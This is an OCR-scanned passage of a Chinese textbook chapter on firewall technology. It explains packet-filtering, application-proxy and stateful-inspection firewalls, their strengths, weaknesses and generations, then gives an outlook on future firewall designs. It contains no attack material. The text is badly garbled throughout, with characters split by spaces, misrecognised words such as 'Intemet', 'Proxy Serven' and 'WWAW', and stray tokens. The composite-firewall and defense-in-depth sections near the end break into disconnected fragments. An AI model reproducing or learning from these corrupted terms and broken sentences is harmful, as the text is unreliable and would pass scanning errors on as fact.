全 传送 ， 并 且 充 分 利用 网 络 带宽 ， 提 供 负载 均衡 的 能 

而 个 人 防火 墙 主要 是 为 了 防护 个 人 的 主机 ， 一 般 就 是 前 面 所 述 的 单机 防火 墙 。 其 功能 
一 般 较 简单 。 

4. 包 过 滤 防火 墙 、 应 用 代理 防火 墙 和 状态 检测 防火 墙 

这 种 分 类 方法 是 最 主要 、 最 基本 的 一 种 分 类 方法 。 其 分 类 依据 是 防火 墙 检查 点 的 位 置 。 

(1) 包 过 滤 防 火 墙 是 在 网 络 层 对 数据 包 进 行 选择 ， 选 择 的 依据 是 系统 内 设置 的 访问 控 
制 表 (Access Control Table，ACT)。 通 过 检查 数据 流 中 每 个 数据 包 的 源 地 址 、 目 的 地 址 、 所 
的 端口 号 、 协 议 状 态 等 因素 或 它们 的 组 合 ， 来 确定 是 否 允许 该 数据 包 通 过 。 这 种 防火 墙 
逻辑 简单 ， 价 格 便宜 ， 易 于 安装 和 使 用 ， 网 络 性 能 和 透明 性 好 。 然 而 ， 非 法 访问 一 旦 突破 
防火 墙 ， 即 可 对 主机 上 的 软件 和 配置 漏洞 进行 攻击 ; 同时， 数据 包 的 源 地 址 、 目 的 地 址 以 
及 Pp 的 端口 号 都 在 数据 包 的 头 部 ， 很 有 可 能 被 窃听 或 假冒 。 

(2) 应 用 代理 防火 墙 是 内 网 与 外 网 的 隔离 点 ， 能 够 监视 和 隔绝 应 用 层 通信 流 ， 同 时 也 
常 结合 包 过 滤器 功能 。 应 用 代理 防火 墙 工作 在 OSI 模型 的 最 高 层 ， 掌 握 着 应 用 系统 中 可 用 
作 安 全 决策 的 全 部 信息 。 此 类 防火 墙 的 安全 性 比 包 过 滤 防 火 墙 高 ， 但 它 的 效率 则 相对 较 低 。 

(3) 状态 检测 防火 墙 把 包 过 滤 的 快速 性 和 应 用 代理 的 安全 性 很 好 地 结合 在 一 起 ， 目 前 
已 经 是 防火 墙 最 流行 的 检测 方式 。 

状态 检测 防火 墙 试图 跟踪 通过 防火 墙 的 网 络 连 接 和 包 ， 这 样 防 火 墙 就 可 以 使 用 一 组 附 
加 的 标准 ， 以 确定 允许 或 拒绝 通信 。 状 态 检测 防火 墙 是 在 使 用 了 基本 包 过 滤 防 火 墙 的 通信 
基础 上 应 用 一 些 技术 来 做 到 这 点 的 。 

状态 检测 防火 墙 不 仅 跟踪 包 中 包含 的 信息 ， 还 能 够 记录 有 用 的 信息 以 帮助 识别 包 ， 如 
已 有 的 网 络 连 接 、 数 据 的 传 出 请 求 等 。 

状态 检测 防火 墙 可 截断 所 有 传 入 的 通信 ， 而 允许 所 有 传 出 的 通信 。 因 为 防火 墙 跟 踪 内 
部 出 去 的 请 求 ， 所 有 按 要 求 传 入 的 数据 被 允许 通过 ， 直 到 连接 被 关闭 为 止 。 只 有 未 被 请 求 
的 传 入 通信 被 截断 。 


6.2 防火墙 技 术 


随 着 防火 墙 技 术 的 不 断 发 展 ， 目 前 应 用 的 防火 墙 技 术 主 要 有 包 过 滤 技 术 、 应 用 代理 技 


6.2.1 包 过 滤 技 术 


1. 包 过 滤 技 术 简介 
包 过 滤 (Packet Filtering) 技 术 依 据 系统 事先 设 定好 的 过 滤 规 则 ， 检 查 数据 流 中 的 每 个 
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包 ， 根 据 包头 信息 来 确定 是 否 允许 数据 包 通 过 ， 并 拒绝 发 送 可 疑 的 数据 包 。 

使 用 包 过 滤 技 术 的 防火 墙 叫 作 包 过 滤 防 火 墙 Packet Filtering Firewall))， 因 为 它 工作 在 
网 络 层 ， 又 叫 作 网 络 层 防 火 墙 (Network Level Firewall)。 

包 过 滤 技 术 的 依据 是 分 包 传输 技术 。 网 络 上 的 数据 都 是 以 包 为 单位 进行 传输 的 ， 数 据 
被 分 割 成 一 定 大 小 的 包 ， 每 个 包 分 为 包头 和 数据 两 部 分 ， 包 头 中 含有 源 地 址 和 目的 地 址 等 
信息 。 路 由 器 从 包头 中 读 取 目 的 地 址 并 选择 一 条 物理 线路 发 送出 去 ， 当 所 有 的 包 抵 达 后 会 
在 目的 地 重新 组 装 还 原 。 

包 过 滤 防 火 墙 一 般 由 屏蔽 路 由 器 (Screening Router， 也 称 为 过 滤 路 由 器 ) 来 实现 ， 这 种 
路 由 器 在 普通 路 由 器 的 基础 上 加 入 IP 过 滤 功 能 ， 是 防火 墙 最 基本 的 构件 ， 包 过 滤 防 火 墙 工 
作 原 理 如 图 6.2 所 示 。 


6.2 包 过 滤 防火 墙 工作 原理 框图 


包 过 滤 防 火 墙 读 取 包 头 信息 ， 与 信息 过 滤 规 则 比较 ， 顺 序 检 查 规 则 表 中 每 一 条 规则 ， 
直至 发 现 包 中 的 信息 与 某 条 规则 相符 。 如 果 有 一 条 规则 不 允许 发 送 某 个 包 ， 路 由 器 就 将 它 
丢弃 ; 如 果 有 一 条 规则 允许 发 送 某 个 包 ， 路 由 器 就 将 它 发 送 ， 如 果 没 有 任何 一 条 规则 能 符 
合 ， 路 由 器 就 会 使 用 默认 规则 ， 一 般 情况 下 ， 默 认 规则 就 是 禁止 该 包 通 过 。 

屏蔽 路 由 器 是 一 种 价格 较 高 的 硬件 设备 。 如 果 网 络 不 很 大 ， 可 以 由 一 台 PC 机 装 上 相 
应 的 软件 (如 KarlBridge、DrawBridge) 来 实现 包 过 滤 功能 。 

2. 包 过 滤 防 火 墙 的 优点 

包 过 滤 防 火 墙 具有 明显 的 优点 。 

(1) 一 个 屏蔽 路 由 器 能 保护 整个 网 络 。 一 个 恰当 配置 的 屏蔽 路 由 器 连接 内 部 网 络 与 外 
部 网 络 ， 进 行 数据 包 过 滤 ， 就 可 以 取得 较 好 的 网 络 安全 效果 。 

(2) 包 过 滤 对 用 户 透明 。 包 过 滤 不 要 求 任何 客户 机 配置 ， 当 屏蔽 路 由 器 决定 让 数据 包 
通过 时 ， 它 与 普通 路 由 器 没什么 区 别 ， 用 户 感觉 不 到 它 的 存在 。 较 强 的 透明 度 是 包 过 滤 的 
一 大 优势 。 

(3) 屏蔽 路 由 器 速度 快 、 效 率 高 。 屏 蔽 路 由 器 只 检查 包头 信息 ， 一 般 不 查看 数据 部 
分 ， 而 且 某 些 核心 部 分 是 由 专用 硬件 实现 的 ， 故 其 转发 速度 快 、 效 率 较 高 ， 通 常 作为 网 络 
安全 的 第 一 道 防线 。 

3. 包 过 滤 防火 墙 的 缺点 

(1) 屏蔽 路 由 器 的 缺点 也 是 很 明显 的 ， 通 常 它 不 保存 用 户 的 使 用 记录 ， 这 样 就 不 能 从 
访问 记录 中 发 现 黑客 的 攻击 记录 。 

(2) 配置 繁琐 也 是 包 过 滤 防 火 墙 的 一 个 缺点 。 没 有 一 定 的 经 验 ， 是 不 可 能 将 过 滤 规 则 
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配置 得 完美 的 。 有 些 的 时 候 ， 因 为 配置 错误 ， 防 火 墙根 本 就 不 起 作用 。 
(3) 包 过 滤 的 另 一 个 弱点 就 是 不 能 在 用 户 级 别 上 进行 过 滤 ， 只 能 认为 内 部 用 户 是 可 信 
任 的 、 外 部 用 户 是 可 疑 的 。 
(4) 单纯 由 屏蔽 路 由 器 构成 的 防火 墙 并 不 十 分 安全 ， 一 旦 屏蔽 路 由 器 被 攻陷 就 会 对 整 
个 网 络 产生 威胁 。 


4. 包 过 滤 防 火 墙 的 发 展 阶段 


(1) 第 一 代 : 静态 包 过 滤 防 火 墙 。 第 一 代 包 过 滤 防 火 墙 与 路 由 器 同时 出 现 ， 实 现 了 根 
据 数 据 包头 信息 的 静态 包 过 滤 ， 这 是 防火 墙 的 初级 产品 。 静 态 包 过 滤 防 火 墙 对 所 接收 的 每 
个 数据 包 审查 包头 信息 ， 以 便 确 定 其 是 否 与 某 一 条 包 过 滤 规 则 匹配 ， 然 后 做 出 允许 或 者 拒 
绝 通过 的 决定 。 

(2) 第 二 代 : 动态 包 过 滤 (Dynamic Packet Filter) 防 火 墙 。 此 类 防火 墙 采 用 动态 设置 包 过 
滤 规 则 的 方法 ， 避 免 了 静态 包 过 滤 所 存在 的 问题 。 动 态 包 过 滤 只 有 在 用 户 的 请 求 下 才 打开 
端口 ， 并 且 在 服务 完毕 之 后 关闭 端口 ， 从 而 降低 受到 与 开放 端口 相关 攻击 的 可 能 性 。 防 火 
墙 可 以 动态 地 决定 哪些 数据 包 可 以 通过 内 部 网 络 的 链 路 和 应 用 程序 层 服务 ， 用 户 可 以 配置 
相应 的 访问 策略 ， 只 有 在 允许 范围 之 内 才 自 动 打开 端口 ， 当 通信 结束 时 关闭 端口 。 

这 种 方法 在 两 个 方向 上 都 将 暴露 端口 的 数量 减少 到 最 小 ， 给 网 络 提供 更 高 的 安全 性 。 
对 于 许多 应 用 程序 协议 而 言 ， 如 媒体 流 ， 动 态 人 P 包 过 滤 提 供 了 处 理 动态 分 配 端 口 的 最 安全 
方法 。 

(3) 第 三 代 : 全 状态 检测 (Stateful Inspection) 防 火 墙 。 第 三 代 包 过 滤 类 防火 墙 采 用 状态 
检测 技术 ， 在 包 过 滤 的 同时 检查 数据 包 之 间 的 关联 性 ， 检 查 数据 包 中 动态 变化 的 状态 码 。 
它 有 一 个 监测 引擎 ， 能 够 抽取 有 关 数 据 ， 从 而 对 网 络 通信 的 各 层 实施 监测 ， 并 动态 地 保存 
状态 信息 作为 以 后 执行 安全 策略 的 参考 。 当 用 户 访问 请 求 到 达 网 关 的 操作 系统 前 ， 状 态 监 
视 器 要 抽取 有 关 数 据 进行 分 析 ， 结 合 网 络 配置 和 安全 规定 作出 接纳 、 拒 绝 、 身 份 认证 、 报 
警 或 给 该 通信 加 密 等 操作 。 

状态 检测 防火 墙 保留 状态 连接 表 ， 并 将 进出 网 络 的 数据 当成 一 个 个 会 话 ， 利 用 状态 表 
跟踪 每 一 个 会 话 状 态 。 状 态 监 测 对 每 一 个 包 的 检查 不 仅 根据 规则 表 ， 更 考虑 了 数据 包 是 否 
符合 会 话 所 处 的 状态 ， 因 此 提供 了 完整 的 对 传输 层 的 控制 能 

状态 检测 技术 在 大 大 提高 安全 防范 能 力 的 同时 也 改进 了 流量 处 理 速度 ， 使 防火 墙 性 能 
大 幅度 提升 ， 因 而 能 应 用 在 各 类 网 络 环境 中 ， 尤 其 是 在 一 些 规则 复杂 的 大 型 网 络 上 。 

(4) 第 四 代 : 深度 包 检 测 (Deep Packet Inspection) 防 火 墙 。 状 态 检 测 防火 墙 的 安全 性 得 

到 一 定 程度 的 提高 ， 但 是 在 对 付 DDoS( 分 布 式 拒绝 服务 ) 攻 击 、 实 现 应 用 层 内 容 过 滤 、 病 毒 
过 滤 等 方面 的 表现 还 不 能 尽 如 人 意 。 
而 对 新 形势 下 的 蠕虫 病毒 、DDoS 攻击 、 垃 圾 邮件 泛滥 等 严重 威胁 ， 最 新 一 代 包 过 滤 
防火 墙 采用 了 深度 包 检 测 技术 。 深 度 包 检 测 技术 融合 入 侵 检测 和 攻击 防范 两 方面 功能 ， 不 
仅 能 深入 检查 信息 包 ， 查 出 恶意 行为 ， 还 可 以 根据 特征 检测 和 内 容 过 滤 ， 来 寻找 已 知 的 攻 
击 ， 同 时 能 阻止 异常 的 访问 。 深 度 包 检 测 引 擎 以 基于 指纹 匹配 、 启 发 式 技术 、 异 常 检测 以 
及 统计 学 分 析 等 技术 来 决定 如 何 处 理 数 据 包 。 深 度 包 检测 防火 墙 能 阻止 DDoS 攻击 、 病 毒 
传播 问题 和 高 级 应 用 入 侵 问 题 。 
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6.2.2 ”应 用 代理 技术 


1. 代理 服务 器 简介 


代理 服务 器 (Proxy Serven) 是 指 代表 内 网 用 户 向 外 网 服务 器 进行 连接 请 求 的 服务 程序 。 
代理 服务 器 运行 在 两 个 网 络 之 间 ， 它 对 于 客户 机 来 说 像 是 一 台 真 的 服务 器 ， 而 对 于 外 网 的 
服务 器 来 说 它 又 是 一 台 客 户 机 。 

代理 服务 器 的 基本 工作 过 程 : 当 客户 机 需要 使 用 外 网 服务 器 上 的 数据 时 ， 首 先 将 请 求 
发 给 代理 服务 器 ， 代 理 服务 器 再 根据 这 一 请 求 向 服务 器 索取 数据 ， 然 后 再 由 代理 服务 器 将 
数据 传输 给 客户 机 。 

同 理 ， 代 理 服 务 器 在 外 部 网 络 向 内 部 网 络 申请 服务 时 也 发 挥 了 中 间 转 接 的 作用 ， 代 理 
防火 墙 工作 原理 如 图 6.3 所 示 。 
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内 网 只 接受 代理 服务 器 提出 的 服务 请 求 ， 拒 绝 外 网 的 直接 请 求 。 当 外 网 向 内 网 的 某 个 
节点 申请 某 种 服务 (如 FTP、Telnet、WWW 等 ) 时 ， 先 由 代理 服务 器 接受 ， 然 后 代理 服务 器 
根据 其 服务 类 型 、 服 务 内 容 、 被 服务 对 象 等 决定 是 否 接受 此 项 服务 。 如 果 接 受 ， 就 由 代理 
服务 器 向 内 网 转发 这 项 请 求 ， 并 把 结果 反馈 给 申请 者 。 

可 以 看 出 ， 由 于 外 部 网 络 与 内 部 网 络 之 间 没 有 直接 的 数据 通道 ， 外 部 的 恶意 入 侵 也 就 
很 难 伤害 到 内 网 。 

代理 服务 器 通常 拥有 高 速 缓 存 ， 缓 存 中 存 有 用 户 经 常 访问 站 点 的 内 容 ， 在 下 一 个 用 户 要 
访问 同样 的 站 点 时 ， 服 务 器 就 不 必 重 复读 取 同 样 的 内 容 ， 既 节约 了 时 间 也 节约 了 网 络 资源 。 


2. 应 用 代理 的 优点 


(D 应 用 代理 易于 配置 。 代 理 因为 是 一 个 软件 ， 所 以 比 过 滤 路 由 器 容易 配置 。 如 果 代 
理 实现 得 好 ， 可 以 对 配置 协议 要 求 较 低 ， 从 而 避免 了 配置 错误 。 

(2) 应 用 代理 能 生成 各 项 记录 。 因 代理 在 应 用 层 检查 各 项 数据 ， 所 以 可 以 按 一 定 准 
则 ， 让 代理 生成 各 项 日 志 、 记 录 。 这 些 日 志 、 记 录 对 于 流量 分 析 、 安 全 检验 是 十 分 重要 和 
宝贵 的 。 
(3) 应 用 代理 能 灵活 、 完 全 地 控制 进出 信息 。 通 过 采取 一 定 的 措施 ， 按 照 一 定 的 规 
则 ， 可 以 借助 代理 实现 一 整套 的 安全 策略 ， 控 制 进出 信息 。 

(4) 应 用 代理 能 过 滤 数据 内 容 。 可 以 把 一 些 过 滤 规 则 应 用 于 代理 ， 让 它 在 应 用 层 实现 
过 滤 功 能 。 
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3. 应 用 代理 的 缺点 


(1) 应 用 代理 速度 比 路 由 器 慢 。 路 由 器 只 是 简单 查看 包头 信息 ， 不 作 详 细 分 析 、 记 
录 ; 而 代理 工作 于 应 用 层 ， 要 检查 数据 包 的 内 容 ， 按 特定 的 应 用 协议 对 数据 包 内 容 进行 虽 
查 、 扫 描 ， 并 转发 请 求 或 响应 ， 故 其 速度 比 路 由 器 慢 。 

(2) 应 用 代理 对 用 户 不 透明 。 许 多 代理 要 求 客户 端 作 相应 改动 或 定制 ， 因 而 增加 了 不 
透明 度 。 为 内 部 网 络 的 每 一 台 主 机 安装 和 配置 特定 的 客户 端 软 件 既 耗 费时 间 又 容易 出 错 。 

(3) 对 于 每 项 服务 ， 应 用 代理 可 能 要 求 不 同 的 服务 器 。 因 此 可 能 需要 为 每 项 协议 设置 
一 个 不 同 的 代理 服务 器 ， 挑 选 、 安 装 和 配置 所 有 这 些 不 同 的 服务 器 是 一 项 繁重 的 工作 。 

(4) 应 用 代理 服务 通常 要 求 对 客户 或 过 程 进行 限制 。 除 了 一 些 为 代理 而 设 的 服务 外 ， 
代理 服务 器 要 求 对 客户 或 过 程 进行 限制 ， 每 一 种 限制 都 有 不 足 之 处 ， 人 们 无 法 按 他 们 自己 
的 步骤 工作 。 由 于 这 些 限 制 ， 代 理应 用 就 不 能 像 非 代理 应 用 那样 灵活 运用 。 

(5) 应 用 代理 服务 受 协议 弱点 的 限制 。 每 个 应 用 层 协议 ， 都 或 多 或 少 存在 一 些 安全 问题 ， 
对 于 一 个 代理 服务 器 来 说 ， 要 彻底 避免 这 些 安全 隐患 几乎 是 不 可 能 的 ， 除 非 关 掉 这 些 服务 。 

(6) 应 用 代理 不 能 改进 底层 协议 的 安全 性 。 


4. 应 用 代理 防火 墙 的 发 展 阶段 


(1) 应 用 层 代 理 (Application Proxy)。 应 用 层 代 理 也 称 为 应 用 层 网 关 (Application Level 
Gateway)， 这 种 防火 墙 的 工作 方式 同 包 过 滤 防 火 墙 的 工作 方式 具有 本 质 区 别 。 

代理 服务 是 运行 在 防火 墙 主机 上 的 、 专 门 的 应 用 程序 或 者 服务 器 程序 。 应 用 层 代理 为 
某 个 特定 应 用 服务 提供 代理 ， 它 对 应 用 协议 进行 解析 并 解释 应 用 协议 的 命令 。 根 据 其 处 理 
协议 的 功能 可 分 为 FTP 网 关 型 防火 墙 、Telnet 网 关 型 防火 墙 、WWAW 网 关 型 防火 墙 等 。 

(2) 电路 层 代理 (Circuit Proxy)。 另 一 种 类 型 的 代理 技术 称 为 电路 层 网 关 (Circuit 
Gateway)， 也 称 为 电路 级 代理 服务 器 。 在 电路 层 网 关中 ， 包 被 提交 到 用 户 应 用 层 处 理 。 电 
路 层 网 关 用 来 在 两 个 通信 的 终点 之 间 转 换 包 。 

在 电路 层 网 关中 ， 可 能 要 安装 特殊 的 客户 机 软件 ， 用 户 需 要 一 个 可 变 接口 来 相互 作用 
或 改变 他 们 的 工作 习惯 。 

电路 层 代理 适用 于 多 个 协议 ， 但 无 法 解释 应 用 协议 ， 需 要 通过 其 他 方式 来 获得 信息 。 
所 以 ， 电 路 级 代理 服务 器 通常 要 求 修改 用 户 程序 。 其 中 ， 套 接 字 服务 器 (Sockets Server) 就 
是 电路 级 代理 服务 器 。 套 接 字 是 一 种 网 络 应 用 层 的 国际 标准 。 当 内 网 客户 机 需要 与 外 网 交 
互信 息 时 ， 在 防火 墙 上 的 套 接 字 服 务 器 检查 客户 的 UserID、IP 源 地 址 和 卫 目的 地 址 ， 经 
过 确认 后 ， 套 接 字 服务 器 才 与 外 部 的 服务 器 建立 连接 。 对 用 户 来 说 ， 内 网 与 外 网 的 信息 交 
换 是 透明 的 ， 感 觉 不 到 防火 墙 的 存在 ， 那 是 因为 Intemet 用 户 不 需要 登录 到 防火 墙 上 。 但 
是 客户 端的 应 用 软件 必须 支持 Socketsifide API， 内 部 网 络 用 户 访问 外 部 网 所 使 用 的 卫 地 
址 也 都 是 防火 墙 的 下 地址 。 

(3) 自 适 应 代理 (Adaptive Proxy)。 应 用 层 代 理 的 主要 问题 是 速度 慢 ， 支 持 的 并 发 连接 
数 有 限 。 因 此 ，NAI 公司 在 1998 年 又 推出 了 具有 “ 自 适应 代理 ”特性 的 防火 墙 。 

适应 代理 不 仅 能 维护 系统 安全 ， 还 能 够 动态 “适应 ”传送 中 的 分 组 流量 。 它 能 够 根 
据 具 体 需求 ， 定 义 防 火 墙 策略 ， 而 不 会 牺牲 速度 或 安全 性 。 如 果 对 安全 要 求 较 高 ， 则 最 初 
的 安全 检查 仍 在 应 用 层 进行 ， 保 证 实现 传统 代理 防火 墙 的 最 大 安全 性 。 而 一 旦 代理 明确 了 


/148\. 


于 


oh 


第 6 章 防火 墙 技术 人 


会 话 的 所 有 细节 ， 其 后 的 数据 包 就 可 以 直接 经 过 速度 更 快 的 网 络 层 。 

适应 代理 可 以 和 安全 脆弱 性 扫描 器 、 病 毒 安 全 扫描 器 和 入 侵 检测 系统 之 间 实 现 更 加 
灵活 的 集成 。 作 为 自 适应 安全 计划 的 一 部 分 ， 自 适应 代理 将 允许 经 过 正确 验证 的 设备 在 安 
全 传感器 和 扫描 器 发 现 重 要 的 网 络 威胁 时 ， 根 据 防 火 墙 管理 员 事先 确定 的 安全 策略 ， 自 动 
“适应 ”防火 墙 级 别 。 


6.2.3 ”状态 监视 技术 


1. 状态 监视 技术 简介 

状态 检测 (Stateful Inspection) 是 由 CheckPoint 公司 于 1993 年 提出 的 ， 它 是 防火 墙 技术 
的 一 项 突破 性 变革 ， 把 包 过 滤 的 快速 性 和 代理 的 安全 性 很 好 地 结合 在 一 起 ， 目 前 已 经 是 防 
火 墙 最 流行 的 检测 方式 。 状 态 检测 技术 克服 了 以 上 两 种 技术 的 缺点 ， 引 入 了 OSI 全 7 层 监 
测 能 力 ， 同 时 又 能 保持 Client/Server 的 体系 结构 ， 也 即 对 用 户 访问 是 透明 的 。 

与 包 过 滤 防 火 墙 相 比 ， 状 态 检测 防火 墙 判断 的 依据 也 是 源 他 地 址 、 目 的 瑟 地 址 、 源 
端口 、 目 的 端口 和 通信 协议 等 。 与 包 过 滤 防 火 墙 不 同 的 是 ， 状 态 检测 防火 墙 是 基于 会 话 信 
息 做 出 决策 的 ， 而 不 是 包 的 信息 ; 状态 检测 防火 墙 验证 进来 的 数据 包 时 ， 判 断 当 前 数据 包 

否 符合 先前 允许 的 会 话 ， 并 在 状态 表 中 保存 这 些 信 息 。 状 态 检测 防火 墙 还 能 阻止 基于 蜡 
常 TCP 的 网 络 层 的 攻击 行为 。 网 络 设备 ， 比 如 路 由 器 ， 会 将 数据 包 分 解 成 更 小 的 数据 帧 ， 
因此 ， 状 态 检测 设备 ， 通 常 需要 将 卫 数据 帧 按 其 原来 顺序 组 装 成 完整 的 数据 包 。 状 态 检测 
防火 墙 工作 原理 如 图 6.4 所 示 。 
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图 6.4 状态 检测 防火 墙 工作 原理 示意 图 


状态 检测 的 基本 思想 是 对 所 有 网 络 数据 建立 “连接 ”的 概念 ， 既 然 是 连接 ， 必 然 有 一 
定 的 顺序 ， 通 信 两 边 的 连接 状态 也 是 按 一 定 顺序 进行 变化 的 ， 就 像 打 电话 ， 一 定 要 先 拨 
号 ， 对 方 电话 才能 振 铃 。 防 火 墙 的 状态 检测 就 是 事先 确定 好 连接 的 合法 过 程 模式 ， 如 果 数 
据 过 程 符合 这 个 模式 ， 则 说 明 数 据 是 合法 正确 的 ， 否 则 就 是 非法 数据 ， 应 该 被 丢弃 。 
以 下 以 面向 连接 的 TCP 协议 为 例 来 作 具 体 说 明 。 
TCP 协议 是 一 个 标准 的 面向 连接 协议 ， 在 真正 通信 前 必须 按 一 定 协议 先 建立 连接 ， 连 
接 建 立 好 后 才能 通信 ， 通 信 结 束 后 释放 连接 。 连 接 建 立 过 程 称 为 三 次 握手 ， 发 起 方 先 发 送 
带 有 SYN 标志 的 数据 包 到 目的 方 ， 如 果 目 的 方 端口 是 允许 连接 的 ， 就 会 回应 一 个 带 SYN 
和 ACK 的 标志 ， 发 起 方 收 到 后 再 发 送 一 个 只 带 ACK 标志 的 数据 包 到 目的 方 ， 目 的 方 收 到 
后 就 可 认为 连接 已 经 正确 建立 ， 在 正常 断 开 时 ， 一 方 会 发 送 带 FIN 标志 的 数据 包 到 对 方 ， 表 
示 本 方 已 经 不 会 再 发 送 数据 了 ， 但 还 可 以 接收 数据 ， 对 方 接收 后 还 可 以 发 数据 ， 发 完 后 也 会 
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发 送 带 FIN 标志 的 数据 包 ， 双 方 进入 断 开 状态 ， 经 过 一 段 时 间 后 连接 彻底 删除 。 如 有 异常 情 
况 则 会 发 送 RST 标志 的 包 来 执行 异常 断 开 ， 不 论 是 在 连接 开始 ， 还 是 通信 或 断 开 过 程 。 

由 此 可 见 ，TCP 的 连接 过 程 是 一 个 有 序 过 程 ， 新 连接 一 定 是 通过 SYN 包 来 开始 的 ， 
如 果 防 火 墙 里 没有 相关 连接 信息 ， 就 收 到 非 SYN 包 ， 那 该 包 一 定 是 非法 的 ， 可 以 将 其 扔 
掉 ; 数据 通信 过 程 是 有 方向 性 的 ， 一 定 是 发 起 方 发 送 SYN， 接 收 方 发 送 SYN ACK,， 不 是 
此 方向 的 数据 就 是 非法 的 ， 由 此 状态 检测 可 以 实现 A 可 以 访问 B 而 B 却 不 能 访问 A 的 效 
果 。 一 个 连接 可 以 用 协议 、 源 地 址 、 目 的 地 址 、 源 端口 、 目 的 端口 等 五 元 组 来 唯一 确定 。 

2. 状态 检测 防火 墙 的 优点 

(1) 检查 他 包 每 个 字段 的 能 力 ， 并 遵从 基于 包 中 信息 的 过 滤 规 则 。 

(2) 识别 带 有 欺骗 性 源 耳 地 址 包 。 

(3) 状态 检测 防火 墙 是 两 个 网 络 之 间 访 问 的 唯一 来 源 。 因 为 所 有 的 通信 必须 通过 防火 
墙 ， 绕 过 是 困难 的 。 

(4) 基于 应 用 程序 信息 验证 一 个 包 的 状态 。 例 如 ， 基 于 一 个 已 经 建立 的 FTP 连接 ， 允 
许 返 回 的 FTP 包 通 过 。 

(5) 基于 应 用 程序 信息 验证 一 个 包 的 状态 。 例 如 ， 人 允许 一 个 先前 认证 过 的 连接 继续 与 
被 授予 的 服务 通信 。 

(6) 记录 通过 的 每 个 包 的 详细 信息 。 防 火 墙 用 来 确定 包 状 态 的 所 有 信息 都 可 以 被 记 
录 ， 包 括 应 用 程序 对 包 的 请 求 、 连 接 的 持续 时 间 、 内 部 和 外 部 系统 所 做 的 连接 请 求 等 。 

3. 状态 检测 防火 墙 的 缺点 
状态 检测 防火 墙 唯一 的 缺点 就 是 所 有 这 些 记 录 、 测 试 和 分 析 工作 可 能 会 造成 网 络 连接 
的 某 种 迟滞 ， 特 别 是 在 同时 有 许多 连接 激活 的 时 候 ， 或 者 是 有 大 量 的 过 滤 网 络 通信 的 规则 
存在 时 更 是 如 此 。 
4. 状态 检测 防火 墙 的 发 展 阶段 


(1) 状态 检测 防火 墙 (Stateful Inspection Firewall)。 
状态 检测 防火 墙 又 称 为 动态 包 过 滤 防 火 墙 ， 它 在 网 络 层 由 一 个 检查 引擎 截获 数据 包 并 
抽取 出 与 应 用 层 状态 有 关 的 信息 ， 并 以 此 作为 依据 决定 对 该 数据 包 是 接受 还 是 拒绝 。 检 查 
引擎 能 自动 生成 动态 的 状态 信息 表 ， 并 对 后 续 的 数据 包 进行 检查 ， 一 旦 发 现任 何 连接 的 参 
数 有 意外 变化 ， 该 连接 就 被 中 止 。 
状态 检测 防火 墙 克 服 了 包 过 滤 防 火 墙 和 应 用 代理 服务 器 的 局 限 性 ， 能 够 根据 协议 、 端 
及 源 地 址 、 目 的 地 址 的 具体 情况 决定 是 否 允 许 数据 包 通 过 。 对 于 每 个 安全 策略 允许 的 请 
求 ， 状 态 检测 防火 墙 启动 相应 的 进程 ， 可 以 快速 地 确认 符合 授权 流通 标准 的 数据 包 ， 这 使 
得 本 身 的 运行 非常 快速 。 

(2) 深度 检测 防火 墙 (Deep Inspection Firewall)。 

深度 检测 防火 墙 将 状态 检测 和 应 用 防火 墙 技术 结合 在 一 起 ， 以 处 理应 用 程序 的 流量 ， 
防范 目标 系统 免 受 各 种 复杂 的 攻击 。 由 于 结合 了 状态 检测 的 所 有 功能 ， 因 此 深度 检测 防火 
墙 能 够 对 数据 流量 迅速 完成 网 络 层级 别 的 分 析 ， 并 做 出 访问 控制 决策 ， 对 于 允许 的 数据 
流 ， 根 据 应 用 层级 别 的 信息 ， 对 负载 做 出 进一步 的 决策 。 

状态 检测 技术 在 大 力 提高 安全 防范 能 力 的 同时 也 改进 了 流量 处 理 速度 。 状 态 监测 技术 
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系列 优化 技术 ， 使 防火 墙 性 能 大 幅度 提升 ， 能 应 用 在 各 类 网 络 环境 中 ， 尤 其 是 在 一 
的 大 型 网 络 上 。 深 度 检测 技术 对 数据 包头 或 有 效 载荷 所 封装 的 内 容 进行 分 析 ， 
过 滤 和 记录 


于 IP 的 应 用 程序 和 Web 服务 通信 流量 ， 其 工作 并 不 受 协议 种 类 
采用 深度 检测 技术 ， 企 业 网 络 可 以 获得 性 能 上 的 大 幅度 提升 而 无 
是 其 他 安全 产品 。 


的 防火 墙 多 是 几 种 技术 的 集成 ， 即 复合 型 防火 墙 。 复 合 型 防火 墙 是 指 综合 了 


状态 检测 与 透明 代理 的 新 一 代 防 火 墙 ， 它 基于 ASIC 架构 ， 把 防 病毒 、 内 容 过 滤 整 合 到 防 


火 墙 里 ， 


信息 安全 的 新 思路 。 它 
署 病毒 防护 、 内 容 过 滤 等 应 用 层 服 务 措施 。 
复合 型 防火 墙 工作 原理 如 图 6.5 所 示 。 


其 中 还 包括 VPN、IDS 功能 ， 多 单元 融 为 一 体 ， 是 一 种 新 的 突破 ， 体 现 了 网 络 与 


在 网 络 边界 实施 OSI 第 7 层 的 内 容 扫描 ， 实 现 了 实时 在 网 络 边缘 部 


检查 整个 报 文 内 容 


性 什 
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6.2.4 ”技术 展望 


随 着 防火 墙 技术 的 发 展 ， 未 来 的 防火 墙 将 向 以 下 几 个 方向 发 展 。 
分 布 式 防火 墙 。 
嵌入 式 防火 墙 。 
深度 防御 。 
主动 防御 。 
与 其 他 安全 技术 联动 ， 从 而 产生 互 操作 协议 。 

专用 化 ， 小 型 化 ， 硬 件 化 。 

为 达成 上 述 防火 墙 发 展 目标 ， 人 们 对 新 的 防火 墙 技术 有 以 下 一 些 展望。 
1. 深度 防御 技术 
深度 防御 技术 是 指 防火 墙 在 整个 协议 栈 上 建立 多 个 安全 检查 点 ， 利 用 各 种 安全 手段 对 


经 过 防火 墙 的 数据 包 进 
滤 掉 所 有 


各 种 网 关 ， 


网 关 等 )， 


的 源 路 由 分 组 和 假冒 人 P 源 地 址 的 分 组 ， 在 传输 层 ， 遵 循 过 滤 规 则 过 滤 掉 所 有 禁止 
出 入 的 协议 报 文 和 有 和 害 数据 包 如 Nuke 包 、 圣 诞 树 包 等 ， 在 应 用 层 ， 利 用 FTP、SMTP 等 
控制 和 监测 Intemet 提供 的 可 用 服务 。 

深度 防御 技术 科学 地 混合 了 现 有 防火 墙 中 已 经 广泛 使 用 的 各 种 安全 技术 ( 包 过 滤 、 应 
因而 具有 很 大 的 灵活 性 和 安全 性 。 


2. 区 域 联防 技术 
